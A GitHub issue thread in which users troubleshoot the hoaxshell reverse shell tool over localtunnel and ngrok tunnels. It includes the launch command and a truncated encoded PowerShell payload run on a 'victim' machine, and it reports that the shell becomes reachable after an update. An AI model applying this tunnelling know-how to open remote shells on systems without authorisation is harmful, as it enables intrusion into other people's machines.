### ISSUE TITLE
Localtunnel not establishing connection

### ISSUE THREAD

**Issue by Skylark055** [t3l3machus/hoaxshell#32]
Hello, 
I've been recently playing around with hoaxshell and trying to make its connection go through localtunnel, instead of running it on a local network. I managed to make it work with Ngok, but this has a limit of 20 connections per minute, which is easily achieved by running a few commands. With localtunnel, no errors arise when running the payload in PowerShell, but no connection is found, nothing happens.  This happened both connected to the same local network and two separate ones. 

Here are the commands I ran on Linux: 
cd hoaxshell/
sudo python3 hoaxshell.py -lt

On windows powershell: 
powershell -e JABzAD0AJwBlAGEAcwB [...] fQA=   

Am I doing this correctly? 
![image](https://user-images.githubusercontent.com/75360414/196111104-f023f568-bbe8-4d95-8711-1566921329be.png)

**Comment by Skylark055** [comment]
![image](https://user-images.githubusercontent.com/75360414/196162049-fbef3d27-b858-4124-873a-5194e19384f5.png)
@juicyhacker this happens for me some 30 sec after terminating the session, but never before that

**Comment by juicyhacker** [comment]
@Skylark055 yeah that's normal because you close the server, mine is when executing the payload as "victim".

**Comment by Skylark055** [comment]
> @Skylark055 yeah that's normal because you close the server, mine is when executing the payload as "victim".

Exactly, weird it does that for you immediately. Strange also that mine seemingly has a connection without a shell

**Comment by juicyhacker** [comment]
> > @Skylark055 yeah that's normal because you close the server, mine is when executing the payload as "victim".
> 
> Exactly, weird it does that for you immediately. Strange also that mine seemingly has a connection without a shell

@Skylark055 The network I was on was refusing connection with LocalTunnel, now on my own network I am having the same issue as you.

**Comment by Skylark055** [comment]
> > > @Skylark055 yeah that's normal because you close the server, mine is when executing the payload as "victim".
> > 
> > 
> > Exactly, weird it does that for you immediately. Strange also that mine seemingly has a connection without a shell
> 
> @Skylark055 The network I was on was refusing connection with LocalTunnel, now on my own network I am having the same issue as you.

That makes sense. Also @davidcenoura Ngrok works fine! It's just rate limited to 20 connections per minute due to it being a free plan, which is only resolved by paying for their services. There is nothing wrong with it, only localtunnel is broken right now for us.

**Comment by t3l3machus** [comment]
@Skylark055 @juicyhacker please, update hoaxshell and try localtunnel again. Let me know if the issue is resolved.

**Comment by MhmadSal** [comment]
@Skylark055  my payload generates fine when trying the ngrok option but when executing it on windows powershell I get the Invalid web request error

**Comment by Skylark055** [comment]
> @Skylark055 @juicyhacker please, update hoaxshell and try localtunnel again. Let me know if the issue is resolved.

Hey, The update fixed one thing: The reverse shell now can be established! As seen with the screenshot attached though, it only executes one command until it breaks. It ended up killing my internet on my windows machine, in effect terminating the shell. 
Here are some screenshots: 
![image](https://user-images.githubusercontent.com/75360414/196618299-2e6bf83b-8827-45e1-bcbb-5c56bffab3f7.png)
![image](https://user-images.githubusercontent.com/75360414/196618381-45651362-809a-48dc-b7f6-ce53a9dffa54.png)
